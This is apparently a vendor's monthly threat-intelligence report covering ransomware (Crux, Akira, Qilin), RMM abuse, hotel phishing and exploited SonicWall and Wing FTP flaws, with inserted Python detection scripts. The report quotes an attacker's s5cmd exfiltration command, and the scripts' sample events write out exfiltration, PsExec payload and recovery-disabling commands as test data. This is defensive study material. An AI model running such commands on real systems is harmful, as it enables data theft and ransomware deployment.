Threat View from the Lens of Huntress Adversary Tactics: July 2025

Threats Seen in the SOC

Adversary Tactics documents, makes sense of, and informs the broader community about interesting threats that surface from our SOC. Here are some examples of standout trends we’ve seen in the last few weeks.

Crux ransomware

We're seeing a new emerging ransomware variant called Crux. So far, we’ve spotted Crux in two incidents since July 2025. There isn’t public reporting on Crux ransomware yet, but according to a ransom note in an incident we detected, Crux claims to be part of BlackByte, a ransomware group with multiple malware variants dating back to 2021.

Excerpt from Crux ransomware ransom note

We’ve seen the following threat activity associated with the Crux ransomware incidents:

  • The use of RClone (typically used by attackers for data exfiltration)
  • Attempts to install drivers and remotely dump the contents of the Windows Registry
  • Attempts to disable Windows Recovery, which makes system restoration harder for victims

Process tree showing threat actor disabling Windows Recovery

The Takeaway

Crux is a previously unreported, emerging ransomware variant. The threat actors behind Crux claim to be part of the BlackByte ransomware group. Our SOC is closely monitoring our customers’ and partners’ environments to better understand the scope of Crux ransomware threat activity while blocking it early in the attack path.


MSP RMM attacks persist

We saw separate incidents in June and July with a similar threat activity pattern: threat actors compromising MSPs’ Atera Remote Monitoring and Management (RMM) instances and then targeting the downstream customers, installing Cloudflare tunnels and, in some cases, deploying Akira ransomware.

Process tree showing how the threat actor compromised an MSP Atera RMM instance

We shared details in a two-part blog series on an initial attack in mid-June, and on several subsequent incidents with similar tactics, techniques, and procedures (TTPs), such as the same Cloudflare tunnel token account tags, the same threat actor workstation names, and identical indicators of compromise (IOCs).

The Takeaway

Threat actors are actively targeting MSPs and their customers. Businesses can defend against RMM abuse by auditing, tracking, and monitoring for both authorized and malicious remote access tools. MSPs should also pay attention to legacy RMMs running in their customers’ environments.


Data exfiltration with open-source tools

Recently, we came across threat actors exfiltrating data with s5cmd, an open-source tool. According to GitHub, this is “a high-performance command-line tool designed for interacting with S3-compatible object storage and local filesystems.”

We saw s5cmd used in a Qilin ransomware attack in the following command line:

s5cmd  --credentials-file credentials cp --include "*.pdf" --include "*.png" --include "*.jpg" --include "*.jpeg" --include "*.xls" --include "*.xlsx" --include "*.tif" --include "*.zip" --include "*.doc" --include "*.docx" "[Folder]" s3://[Resource]

The threat actor accessed the infrastructure via Remote Desktop Protocol (RDP), used s5cmd.exe for data exfiltration, and ultimately used PSExec to push the ransomware executable and launch it on other endpoints.
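As an added example (not Huntress code, and not taken from either incident), the following Python routine runs over constructed process-creation events of the kind an EDR records and flags the behaviours described in the Crux and s5cmd write-ups above: execution of bulk-copy tools (rclone, s5cmd) with the S3 destination and file filters pulled out of the command line, commands that disable the Windows Recovery Environment, and PsExec remote execution. The sample events, host and user names, the bucket name and the bcdedit/reagentc patterns are assumptions, not indicators from the incidents.

```python
import re
import shlex
from dataclasses import dataclass

# Constructed process-creation events shaped like EDR telemetry.
# Hosts, users, paths and the bucket name are placeholders, not incident IOCs.
SAMPLE_EVENTS = [
    {"host": "FS01", "user": "CORP\\svc_backup", "parent": "cmd.exe",
     "cmdline": 's5cmd --credentials-file credentials cp --include "*.pdf" '
                '--include "*.docx" "D:\\Shares\\Finance" s3://example-bucket/out'},
    {"host": "FS01", "user": "CORP\\svc_backup", "parent": "cmd.exe",
     "cmdline": "rclone.exe copy D:\\Shares\\HR remote:drop --transfers 8"},
    {"host": "FS01", "user": "CORP\\svc_backup", "parent": "cmd.exe",
     "cmdline": "PsExec.exe \\\\WS07 -accepteula -c -d C:\\Temp\\payload.exe"},
    {"host": "DC01", "user": "CORP\\admin", "parent": "powershell.exe",
     "cmdline": "bcdedit /set {default} recoveryenabled no"},
    {"host": "WS07", "user": "CORP\\alice", "parent": "explorer.exe",
     "cmdline": "notepad.exe C:\\Users\\alice\\notes.txt"},
]

# Tools commonly abused for bulk copy to cloud storage (assumed watchlist).
EXFIL_TOOLS = {"rclone", "s5cmd"}
# Remote-execution tool named in the Qilin case above.
REMOTE_EXEC_TOOLS = {"psexec", "psexec64"}
# Commands that turn off the Windows Recovery Environment (assumed patterns).
RECOVERY_TAMPER = [
    (re.compile(r"\bbcdedit\b.*\brecoveryenabled\b\s+no\b", re.I),
     "bcdedit disables Windows Recovery Environment"),
    (re.compile(r"\breagentc(\.exe)?\b.*\s/disable\b", re.I),
     "reagentc disables Windows Recovery Environment"),
]
S3_DEST = re.compile(r"s3://[^\s\"']+")
INCLUDE = re.compile(r'--include\s+"?([^"\s]+)"?')


@dataclass
class Finding:
    host: str
    user: str
    tactic: str
    detail: str


def image_name(cmdline: str) -> str:
    """Return the bare executable name (no path, no .exe) from a command line."""
    try:
        first = shlex.split(cmdline, posix=False)[0]
    except ValueError:          # unbalanced quotes: fall back to a plain split
        first = cmdline.split()[0]
    name = first.strip('"').replace("\\", "/").rsplit("/", 1)[-1].lower()
    return name[:-4] if name.endswith(".exe") else name


def analyze(events) -> list:
    """Classify each event; returns one Finding per matched behaviour, in event order."""
    findings = []
    for ev in events:
        cmd, name = ev["cmdline"], image_name(ev["cmdline"])
        if name in EXFIL_TOOLS:
            detail = f"{name} run"
            dest = S3_DEST.search(cmd)
            if dest:
                detail += f" to {dest.group(0)}"
            pats = INCLUDE.findall(cmd)
            if pats:
                detail += " selecting " + ", ".join(pats)
            findings.append(Finding(ev["host"], ev["user"], "exfiltration", detail))
        elif name in REMOTE_EXEC_TOOLS:
            findings.append(Finding(ev["host"], ev["user"], "lateral-movement",
                                    f"{name} remote execution: {cmd}"))
        for rx, desc in RECOVERY_TAMPER:
            if rx.search(cmd):
                findings.append(Finding(ev["host"], ev["user"], "inhibit-recovery", desc))
    return findings


if __name__ == "__main__":
    for f in analyze(SAMPLE_EVENTS):
        print(f"[{f.tactic}] {f.host} {f.user}: {f.detail}")
```

Pulling the destination and the `--include` filters out of the s5cmd line is what turns a generic "unusual binary ran" alert into something an analyst can scope immediately: which share was staged, which file types were selected, and where they went.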

The Takeaway

Our security experts see many types of tools and techniques for data exfiltration - the use of s5cmd shows how threat actors are using open-source tools.


Hotels in the crosshairs of fake captcha phishing schemes

We’ve noticed a recent jump in phishing attacks using fake hotel booking websites (shout out to Austin Worline, Security Operations Analyst, for flagging this trend!).

The phishing example below uses a fake captcha, a technique that tricks users into solving a captcha challenge via social engineering to drop malware. Here’s what happened:

  • A user opened an email with a malicious link for a phony hotel booking webpage and a bogus captcha challenge. Then, the user unknowingly executed a malicious captcha payload, which launched a suspicious payload for persistence.

Webpage instructing the target to solve a fake captcha challenge as part of a phishing attack

In another incident, a user:

  • Got a phishing email in their Outlook account with a suspicious shortened URL
  • Was redirected to another page ("https[:]//2f-regdocuments-approval3d[.]com/ssa/red[.]php"), which triggered a malicious MSI installer
  • Installed unauthorized instances of RMM tools, including Atera and Splashtop RMM
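
The advice earlier in this report to audit and track both authorized and malicious remote access tools, and the unauthorized Atera and Splashtop installs in this incident, can be turned into a simple control. The Python below is an added example (not Huntress code): it compares constructed MSI install events against an assumed per-tenant allowlist of sanctioned RMM products and raises the severity when an unsanctioned RMM was launched from a user-facing process such as a mail client or browser. Tenant names, product-name fragments, hosts and paths are all assumptions.

```python
from dataclasses import dataclass
from typing import Optional

# Assumed allowlist of which RMM products each tenant has actually sanctioned.
AUTHORIZED_RMM = {
    "acme-hotels": {"atera"},     # the MSP's sanctioned RMM for this tenant
    "seaside-resort": set(),      # no remote access tool approved at all
}

# Assumed product-name fragments identifying common RMM / remote access tools.
RMM_SIGNATURES = {
    "atera": ("atera",),
    "splashtop": ("splashtop",),
    "anydesk": ("anydesk",),
    "screenconnect": ("screenconnect", "connectwise control"),
    "teamviewer": ("teamviewer",),
}

# Parents that mean a person clicked something, rather than an RMM pushing a package.
USER_DRIVEN_PARENTS = {"outlook.exe", "chrome.exe", "msedge.exe", "firefox.exe", "explorer.exe"}

# Constructed install events: MSI product name plus the process that launched msiexec.
SAMPLE_INSTALLS = [
    {"tenant": "acme-hotels", "host": "FRONTDESK-02", "product": "Atera Agent 1.8",
     "parent": "AteraAgent.exe", "source": r"C:\Program Files\ATERA Networks\pkg.msi"},
    {"tenant": "acme-hotels", "host": "FRONTDESK-02", "product": "Splashtop Streamer",
     "parent": "msedge.exe", "source": r"C:\Users\desk\Downloads\red.msi"},
    {"tenant": "seaside-resort", "host": "RES-01", "product": "Atera Agent 1.8",
     "parent": "outlook.exe", "source": r"C:\Users\mgr\AppData\Local\Temp\setup.msi"},
    {"tenant": "seaside-resort", "host": "RES-01", "product": "Adobe Acrobat Reader",
     "parent": "explorer.exe", "source": r"C:\Users\mgr\Downloads\reader.msi"},
]


@dataclass
class Verdict:
    host: str
    product: str
    rmm: Optional[str]
    status: str      # "authorized", "unauthorized" or "not-rmm"
    severity: str    # "high" when a user-driven parent installed an unsanctioned RMM


def identify_rmm(product: str) -> Optional[str]:
    """Map an installer product name to a known RMM family, or None."""
    p = product.lower()
    for family, needles in RMM_SIGNATURES.items():
        if any(n in p for n in needles):
            return family
    return None


def review_installs(events, allowlist=AUTHORIZED_RMM) -> list:
    """Compare every RMM install against the tenant's allowlist, in event order."""
    out = []
    for ev in events:
        fam = identify_rmm(ev["product"])
        if fam is None:
            out.append(Verdict(ev["host"], ev["product"], None, "not-rmm", "info"))
            continue
        allowed = fam in allowlist.get(ev["tenant"], set())
        user_driven = ev["parent"].lower() in USER_DRIVEN_PARENTS
        if allowed:
            status, severity = "authorized", "info"
        else:
            status, severity = "unauthorized", ("high" if user_driven else "medium")
        out.append(Verdict(ev["host"], ev["product"], fam, status, severity))
    return out


if __name__ == "__main__":
    for v in review_installs(SAMPLE_INSTALLS):
        print(f"{v.severity:6} {v.status:12} {v.host}: {v.product}")
```

The allowlist is the part that matters: the same Atera package is "authorized" on one tenant and "unauthorized, high" on another, which is exactly the distinction a generic "RMM installed" signature cannot make on its own.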

The Takeaway

We’ve seen increased targeting with email phishing attacks against our partners in the hotel industry. Companies in this sector should be vigilant for signs of these phishing attacks and use Managed Security Awareness Training (SAT) to level up employees’ awareness of phishing threats.

Tactical Response

Our Hunting & Tactical Response team was developed as a separate function within our SOC for deep dives into intrusions and to answer partners’ questions outside the scope of 24x7 SOC operations. It meets the “sweet spot” between a standard MDR offering and a more intensive and formal Incident Response. Our Tactical Response findings also give us a lot of clues about how intrusions play out.

Ransomware findings

A recent project by the Tactical Response team has been to track successful ransomware incidents. The data tracked by the team gives us valuable information about the types of ransomware groups that are targeting our customer base, as well as the vectors that they target for initial access.

As seen in the chart below, the majority of ransomware incidents tracked by Tactical Response are linked to Akira (52.8%). Coming in behind Akira are Qilin (in 11.1% of tracked incidents), LockBit (8.3%) and Crux (8.3%). It’s worth noting that these findings are developed from ransomware incidents tracked specifically by Tactical Response, rather than all ransomware incidents that pass through the SOC.

Breakdown of ransomware groups tracked by Tactical Response

The Tactical Response team’s data also shows us the top initial access vectors used by ransomware groups. While the initial access for the majority of cases could not be determined (and other cases are still under investigation), threat groups got in through VPNs in 27.8% of incidents. They also targeted RDP in 11.1% of incidents and RMMs in 2.8% of cases.

Breakdown of initial access vectors for ransomware groups

Threats Around the World

Ransomware Drops

The relatively new D4rk4rmy ransomware group claimed responsibility for high-profile attacks on Casino de Monte-Carlo and Big Rock Resort, drawing attention to aggressive targeting tactics, like potential data exfiltration and encryption, against the entertainment and hospitality sectors. This group’s legitimacy is under dispute; however, many of their victims do appear to have been compromised by infostealer malware installs prior to their claims. It is believed that the D4rk4rmy ransomware group buys these available infostealer logs prior to making its claims, and is perhaps embellishing the level of its compromises. Regardless of legitimacy, this tactic highlights the common shift of many ransomware groups toward utilizing these resources in order to target victims.

China-linked hackers, including the threat actor known as Storm-2603, ramped up exploitation of Microsoft SharePoint servers as initial access vectors through a zero-day vulnerability chain dubbed ToolShell, including CVE-2025-49706 (an improper authentication spoofing flaw) and CVE-2025-49704 (an insecure deserialization vulnerability). This exploitation leads to SYSTEM-level access on affected systems and subsequent deployment of Warlock (aka X2anylock) and LockBit Black ransomware variants. Ransomware is deployed via a custom command-and-control (C2) framework named AK47 that implements DNS-controlled backdoors, persistent remote access, lateral movement between endpoints, and multi-stage payload delivery.

A harsh reminder of ransomware's devastating impact is the collapse of Einhaus-Gruppe, a major phone repair and insurance firm. It was hit by the Royal hack group and paid about $230,000 in ransom. After making the payment, Einhaus-Gruppe was forced to cut their workforce from 170 employees to eight despite drastic measures like selling property and liquidating investments, calling attention to the financial and operational ruin of these attacks even if ransom demands are met.

Meanwhile, the cross-platform Anubis ransomware is emerging as a dual threat. The ransomware infects both Android and Windows devices to encrypt files while stealing credentials. It is often distributed via phishing or malicious apps, posing significant risks to individual users and enterprises alike. This ransomware strain has introduced a new wiper feature that remotely wipes systems if the ransom is not paid. This will be introduced in additional ransomware families in the future and emphasizes the need for robust backup systems and post-incident isolation steps.

The Takeaway

Ransomware groups, ransomware-as-a-service (RaaS), and nation-state ransomware groups are collectively pivoting faster than ever. They’re moving across industries, changing targets, developing cross-platform malware, creating new C2 platforms, and using sophisticated zero days and advanced toolkits to stay persistent at every opportunity to maximize impact. The cost of being a ransomware victim is sometimes enough to close a business, and without the proper protection, guidance, and procedures in place, any organization can be impacted.


Cybercrime Takedowns

In the past month, several high-profile cybersecurity busts have targeted notorious threat actors, bringing key victories for law enforcement. On July 8, the U.S. Justice Department arrested Xu Zewei, a 33-year-old Chinese national affiliated with the Ministry of State Security, for orchestrating the HAFNIUM campaign that exploited vulnerabilities in over 60,000 Microsoft Exchange servers worldwide. This campaign was the precursor to stolen COVID-19 research from multiple U.S. universities. Zewei is facing charges of wire fraud and computer damage, with up to 20 years in prison.

In mid-July, the UK's National Crime Agency arrested four young suspects, aged 17 to 20, linked to ransomware and data theft operations against major retailers, including M&S, Co-op, and Harrods. They’re being charged under the Computer Misuse Act and for blackmail. This arrest included alleged members of the Scattered Spider (UNC3944) group, and has momentarily shut down their phishing and ransomware campaigns against North American sectors. This group used tactics like push bombing and Raccoon Stealer malware, and several copycat operations continue to cause problems.

And finally, towards the end of July, Operation Checkmate, a collaborative effort involving U.S. agencies, Europol, and other international partners, seized the .onion extortion sites of the BlackSuit ransomware group. This disrupted their data leak and negotiation platforms, though the actors announced they may reemerge under the Chaos brand. Authorities stated that this was part of a multiple-phase takedown, with additional arrests and takedowns scheduled to occur in the next couple of months.

The Takeaway

These takedowns emphasize the growing momentum in international cyber law enforcement, urging cybersecurity professionals to remain vigilant against these threats. The draw to cybercrime is growing, especially among younger individuals dealing with economic struggles, susceptible to social media recruiting, and tempted by the high-risk, high-reward payouts. This has caused law enforcement agencies to shift gears and target groups faster, as well as the middle markets where these payouts and data exchanges occur. We’re seeing positive impacts from these operations, particularly in the infostealer and data dumping communities, which are especially volatile.

Rapid Responses

For the uninitiated, “Rapid Responses” spin up when there is a vulnerability or threat that attackers take advantage of to further escalate their attacks at scale. When we hear about a potential vulnerability, the Adversary Tactics team works across Huntress to figure out the potential impact, update our customers, and publish a blog for the security community with all the necessary threat activity details.

Here are some examples of Rapid Responses that we’ve handled in the last month:

Active Exploitation of SonicWall VPNs

We’ve uncovered active Akira ransomware intrusions exploiting SonicWall appliances, letting adversaries bypass multi-factor authentication (MFA) and gain unauthorized access to internal networks. Using tactics similar to sophisticated ransomware groups like Akira, these threat actors swiftly pivot to domain controllers where they establish persistence by creating rogue user accounts like backupSQL with weak passwords like Password123$, and then elevating them to Domain Admins via commands like “net user” and “net group”. This chain of compromise typically results in Akira ransomware deployment and data exfiltration, with indicators of compromise being observed from malicious IPv4 addresses such as 142.252.99[.]59, 45.86.208[.]240, 77.247.126[.]239, 193.239.236[.]149, 104.238.205[.]105, 104.238.220[.]216, 193.163.194[.]7, and 194.33.45[.]155, often originating from SSL VPN logins.
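The chain above (SSL VPN login from a known-bad address, a freshly created account, then that account landing in Domain Admins) is something a SIEM can correlate rather than alert on piecemeal. The Python below is an added example, not Huntress detection content: it runs over constructed Windows Security events (4720 account created, 4728 member added to a global group) and constructed SSL VPN authentication records, raises an alert when an account is added to a privileged group within an hour of its creation, and ties that alert back to a preceding VPN login from one of the source addresses listed in this write-up. The IOC addresses are the ones above (de-fanged there, plain here for matching); the account and user names, timestamps and the window sizes are assumptions.

```python
from datetime import datetime, timedelta
from typing import Optional

# Source addresses listed in the write-up above (de-fanged there, plain here for matching).
IOC_IPS = {
    "142.252.99.59", "45.86.208.240", "77.247.126.239", "193.239.236.149",
    "104.238.205.105", "104.238.220.216", "193.163.194.7", "194.33.45.155",
}
PRIVILEGED_GROUPS = {"Domain Admins", "Enterprise Admins", "Administrators"}


def ts(s: str) -> datetime:
    return datetime.fromisoformat(s)


# Constructed Windows Security events: 4720 = user account created,
# 4728 = member added to a security-enabled global group. Names are placeholders.
SAMPLE_AD_EVENTS = [
    {"time": ts("2025-07-20T02:10:00"), "id": 4720, "subject": "CORP\\itadmin", "target": "backupSQL"},
    {"time": ts("2025-07-20T02:14:30"), "id": 4728, "subject": "CORP\\itadmin", "target": "backupSQL",
     "group": "Domain Admins"},
    {"time": ts("2025-07-21T09:00:00"), "id": 4720, "subject": "CORP\\hr_ops", "target": "jsmith"},
    {"time": ts("2025-07-21T09:05:00"), "id": 4728, "subject": "CORP\\hr_ops", "target": "jsmith",
     "group": "Sales"},
]

# Constructed SSL VPN authentication records (203.0.113.0/24 is a documentation range).
SAMPLE_VPN_LOGINS = [
    {"time": ts("2025-07-20T01:58:12"), "user": "itadmin", "src_ip": "45.86.208.240", "result": "success"},
    {"time": ts("2025-07-20T08:12:40"), "user": "alice", "src_ip": "203.0.113.17", "result": "success"},
]


def rogue_admin_accounts(events, window: timedelta = timedelta(hours=1)) -> list:
    """Alert when an account joins a privileged group within `window` of being created."""
    created, alerts = {}, []
    for ev in sorted(events, key=lambda e: e["time"]):
        if ev["id"] == 4720:
            created[ev["target"]] = ev
        elif ev["id"] == 4728 and ev.get("group") in PRIVILEGED_GROUPS:
            birth = created.get(ev["target"])
            if birth and ev["time"] - birth["time"] <= window:
                alerts.append({
                    "account": ev["target"], "group": ev["group"], "by": ev["subject"],
                    "created_at": birth["time"],
                    "minutes_after_creation": (ev["time"] - birth["time"]).total_seconds() / 60,
                })
    return alerts


def vpn_ioc_hits(logins) -> list:
    """Successful VPN logins originating from a listed IOC address."""
    return [l for l in logins if l["src_ip"] in IOC_IPS and l["result"] == "success"]


def correlate(ad_events, vpn_logins, lookback: timedelta = timedelta(hours=2)) -> list:
    """Attach to each rogue-admin alert the IOC VPN login by the same operator that preceded it."""
    hits = vpn_ioc_hits(vpn_logins)
    alerts = rogue_admin_accounts(ad_events)
    for a in alerts:
        operator = a["by"].split("\\")[-1].lower()      # CORP\itadmin -> itadmin
        match: Optional[dict] = next(
            (h for h in hits
             if h["user"].lower() == operator
             and timedelta(0) <= a["created_at"] - h["time"] <= lookback),
            None)
        a["vpn_ioc_login"] = match["src_ip"] if match else None
    return alerts


if __name__ == "__main__":
    for a in correlate(SAMPLE_AD_EVENTS, SAMPLE_VPN_LOGINS):
        print(f"{a['account']} -> {a['group']} by {a['by']} "
              f"{a['minutes_after_creation']:.1f} min after creation; VPN IOC: {a['vpn_ioc_login']}")
```

The benign `jsmith` account never alerts because `Sales` is not a privileged group, and an IOC login with no subsequent account activity surfaces only through `vpn_ioc_hits`; the combined alert is the one worth paging on, and the password-reset guidance in the advisory below is the follow-up once it fires.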

Visualization of the timeline of attacks

The Takeaway

In the latest update to its advisory on August 6, SonicWall said it has high confidence that this recent threat activity is not connected to a zero-day flaw, but instead correlates with activity related to CVE-2024-40766, an improper access control flaw first published in August 2024 that can lead to “unauthorized resource access.” SonicWall said that many of the incidents appear to relate to migrations from sixth-generation to seventh-generation firewalls, where local user passwords were carried over during the migrations and were not reset after.

SonicWall is urging customers (who have imported configurations from Gen 6 to newer firewalls) to:

  • Update firmware to version 7.3.0
  • Reset all local user account passwords for accounts with SSL VPN access

Huntress recommends that impacted organizations rotate credentials—both local user account and LDAP account passwords used for Active Directory integration—out of an abundance of caution. We recommend that organizations stay vigilant as we continue to investigate this threat activity.


Wing FTP Server Remote Code Execution (CVE-2025-47812) Exploited in the Wild

We saw active exploitation of Wing FTP Server remote code execution (CVE-2025-47812) in a customer environment on July 1, one day after public disclosure.

CVE-2025-47812 is a null byte and Lua injection flaw that leads to root/SYSTEM-level remote code execution if exploited. It was first publicly disclosed on June 30 by Julien Ahrens and affects versions of Wing FTP Server (a file transfer server for Windows, Linux, and macOS) prior to 7.4.4. Organizations running Wing FTP Server should update to the fixed version, 7.4.4, as soon as possible.

WingFTP RCE exploitation (CVE-2025-47812) seen in the process tree

The Takeaway

Even though we’ve only seen CVE-2025-47812 exploitation activity on one customer, we suggest updating to version 7.4.4 ASAP to minimize vulnerable exposures.

Relevant Product Updates

While not a direct product of the Adversary Tactics team, we’d like to highlight some killer new capabilities that our partners in Product Research and Product have released to help mess up attackers. We can’t wait to start using this data to expand our understanding of the threat actors our customers face.

New Detection Rules

This past month, the Detection Engineering team deployed 85 new detection rules. These additions are strategically designed to identify emerging attack methodologies that could impact organizational operations. The focus included crucial visibility into:

  • Hack Tools & Initial Access: Detecting various hack tools and their execution, suspicious PowerShell activity related to ClickFix initial access, rogue RMM installations, and malicious script execution from common entry points like archives in temporary folders.
  • Privilege Escalation & Defense Evasion: Uncovering attempts to escalate privileges, abuse service permissions to hide activity, tamper with event logs, or use encoded commands to bypass defenses on both Windows and Linux systems.
  • Ransomware & Malware Activity: Identifying patterns associated with known ransomware families, typical malware payload execution, and suspicious processes that indicate active infections.
  • Data Exfiltration & Command and Control: Spotting unauthorized data transfers to suspicious platforms and network connections that might indicate adversary communication channels.
  • SharePoint CVE-2025-49706 + CVE-2025-49704: Detects in-the-wild exploitation of SharePoint servers, which drops a webshell to export machine keys.

Additionally, 157 existing detection rules underwent meticulous review and refinement. Key improvements included:

  • Refining Initial Access Detections: Sharpening our ability to identify suspicious PowerShell execution from the registry, encoded PowerShell download activity, and various forms of suspicious execution originating from common user actions.
  • Strengthening Active Directory & Authentication Monitoring: Enhancing detections for Active Directory user backdoors, suspicious VPN authentications (especially with generic accounts), and unusual login patterns that could indicate compromised credentials.
  • Improving Defense Evasion & Persistence Detection: Boosting our capabilities to identify malicious service creation, modifications to system services, and the use of legitimate tools in suspicious ways to establish persistence or evade defenses.
  • Enhancing Lateral Movement & Reconnaissance Insights: Tuning rules to better detect internal network reconnaissance (e.g., domain discovery commands, user enumeration), lateral movement attempts, and the use of remote access tools in unusual locations.


Managed EDR

Windows

Akira win: Akira is a major threat in the ransomware landscape, and recently Huntress Managed EDR scored a major win by successfully preventing Akira from encrypting a host. The automated protection built into the agent defended against multiple attempts until an analyst was able to isolate the host. The SOC was also able to pull artifacts from the ransomware - which we can now use to better refine our behavior detection efforts.

Bonus: If the customer had had SIEM installed, we would have been alerted 10 minutes earlier - demonstrating how SIEM helps neutralize threats earlier in the attack chain to give a leg up over attackers!

macOS

Expanded macOS Foothold Support: Foothold support for macOS has been expanded to cover the latest persistence technology and older mechanisms used by Mac malware, preventing evasion of Huntress detection.



Managed SIEM

Save and Schedule Searches

SIEM customers can now save queries and schedule them to run on a recurring basis. The results will be automatically emailed - this makes it easy to monitor key data without any additional manual effort.

Added support and detection logic

SIEM has added support for Cisco ASA (Adaptive Security Appliance) and Cisco Firepower Threat Defense as log sources. This will enable deeper visibility and streamlined analysis of network security events.

Additionally, FortiGate detection logic has been enhanced to support non-CEF formatted logs - allowing broader compatibility and more accurate parsing.

Successful brute force detection

A new VPN brute force detection is being tuned and has already caught "bad stuff" in testing, with the brute force attack then hunted down by our SOC.


Managed SAT

Spearphishing simulation now in GA

Building upon our new Threat Simulator capability, we have released a new Spearphishing Simulation to the public, as an extension to August’s Managed Learning. The first simulation on OSINT was well received, and this new spearphishing simulation is no different. 93% of early participants said they gained new knowledge about hackers through the simulation.

Other updates

The SAT team also released Together Mode Learning - a new feature enabling admins to bring learners together in person (or through a screen-share virtual session) to complete security awareness training sessions together. Admins can also mark everyone as completed in the portal.

The team unveiled a new capability to the Learner models allowing us to associate more than one email with a single learner.

Finally, gradual rollout of SCIM support for learners is underway. Current partners and customers can reach out to their Huntress Account Manager if they are interested in joining the Beta.

Highlights

Tradecraft Tuesday

This month’s Tradecraft Tuesday was a fun one: it centered around Hacking on Hollywood. Greg Linares, Matt Kiely, and John Hyland talked about the most accurate - and the worst - hacking scenes in popular film and TV shows.

Haven’t signed up for our Tradecraft Tuesday series? Register here to check out our August episode “A Journey to the Center of the Dark Web."


Notable External Media

Greg Linares joined the renowned Darknet Diaries podcast, where he talked about everything from being the youngest hacker to be arrested in Arizona to wild tales during his time at eEye. You can listen to the podcast here.
